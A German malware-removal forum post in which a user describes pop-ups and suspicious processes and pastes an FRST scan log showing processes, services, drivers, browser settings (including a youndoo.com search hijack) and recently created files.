Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: Trojaner, Adware oder sonstiges ?

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.

Antwort
Alt 19.05.2017, 15:04   #1
dinoexe
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Hallo Trojaner Board,

nach langem googeln bin ich auf eure Seite gestoßen. Ich habe gesehen das ihr schon einigen Usern geholfen habt.
Ich bin sicher das mein Rechner mit irgendwas befallen ist. Am ausfälligsten ist das diverse Browser ( Firefox und Edge ) jeweils unzählige Pop Ups öffnen will, die dank Ad Blocker aber geblockt werden. Einziger Browser mit dem ich halbwegs surfen kann ist der Internet Explorer. Außerdem habe ich festgestellt das sich in der Taskleiste zwischenzeitlich für einen Bruchteil einer Sekunde Prozesse öffnen die ich bisher nicht identifizieren konnte. Habe schon Bitdefender ausprobiert. Dieser findet zwar immer wieder Trojaner und entfernt diese. Jedoch wurde das Problem bisher nicht behoben. Habe schon Vorarbeit geleistet und poste die letzten Logs von Farbar und Bitdefender. Ich hoffe jemand von euch kann mir helfen.

Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 14-05-2017
durchgeführt von Dino (Administrator) auf **** (19-05-2017 14:42:00)
Gestartet von D:\Dino\Downloads
Geladene Profile: Dino (Verfügbare Profile: Dino)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
() C:\Windows\SysWOW64\ASGT.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(AMD) C:\Windows\System32\atieclxx.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
() C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
(ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
() C:\Program Files (x86)\Drakonia Configurator\hid.exe
() C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Microsoft Corporation) C:\Config.Msi\8cb2c81.rbf
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
() C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\HxMail.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\HxTsr.exe
(VS Revo Group) C:\Program Files\VS Revo Group\Revo Uninstaller\RevoUnin.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] ()
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe" 
GroupPolicyScripts-x32: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH)
BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)

FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-19]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)

Chrome: 
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.youndoo.com/search/?q={searchTerms}&z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=sp
CHR DefaultSearchKeyword: ChromeDefaultData -> youndoo
CHR Profile: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-05] <==== ACHTUNG
CHR Extension: (Google Präsentationen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-22]
CHR Extension: (Google Docs) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-22]
CHR Extension: (Google Drive) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-22]
CHR Extension: (YouTube) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-22]
CHR Extension: (Google-Suche) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-22]
CHR Extension: (Google Tabellen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-22]
CHR Extension: (Google Docs Offline) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-22]
CHR Extension: (CrowdBar) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lhinknkceoifkecnmmlgnelmdipmbcdn [2015-11-22]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-22]
CHR Extension: (Google Mail) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-22]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd)
S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] ()
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [4088608 2016-09-21] (Safer-Networking Ltd.) [Datei ist nicht signiert]
S2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [235984 2016-11-24] (Safer-Networking Ltd.) [Datei ist nicht signiert]
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender)
R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.)
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.)
R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.)
R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.)
R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.)
R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.)
R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.)
R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.)
R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.)
R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.)
R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.)
R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.)
R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.)
R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.)
R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.)
R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.)
R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.)
S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-19 14:28 - 2017-05-19 14:42 - 00000000 ____D C:\FRST
2017-05-19 13:51 - 2017-05-19 13:51 - 00000000 ___HD C:\OneDriveTemp
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
